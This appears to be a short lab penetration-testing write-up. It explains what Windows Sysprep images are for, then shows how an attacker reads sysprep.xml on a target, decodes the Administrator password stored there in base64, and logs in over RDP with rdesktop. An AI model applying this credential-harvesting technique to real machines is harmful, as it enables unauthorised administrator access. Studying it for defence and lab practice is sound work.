main practical use
1. Manage multiple PCs by creating a common image that can be used across multiple hardware designs.
2. Deploy the computer by capturing and deploying an image with a unique security identifier.
3. Fine-tune installation on individual PCs by adding applications, languages or drivers in audit mode. For more information, see Audit Mode Overview.
4. Provide more reliable PCs by testing them in audit mode before delivering them to customers.
Summary: Deployment is convenient, and multiple clients are deployed under the domain controller at the same time, saving verification and other operations
penetration
background
Now log in to the target server through NTLM, and find that there is a sysprep.xml file, and check its content to see the account information deployed by the administrator.
C:\Users\Administrator\Documents> type sysprep.xml
<LocalAccounts>
<LocalAccount wcm:action="add">
<Password>
<Value>Zmc1NGZnR0ZINGdmZ0c=</Value>
<PlainText>false</PlainText>
</Password>
<Description>Local Administrator</Description>
<DisplayName>Administrator</DisplayName>
<Group>Administrators</Group>
<Name>Administrator</Name>
</LocalAccount>
</LocalAccounts>
Decrypt the base64 to remotely log in to the target
echo "Zmc1NGZnR0ZINGdmZ0c=" | base64 -d
fg54fgGFH4gfgG
rdesktop -g 1240x600 -u administrator -p "fg54fgGFH4gfgG" 10.11.1.221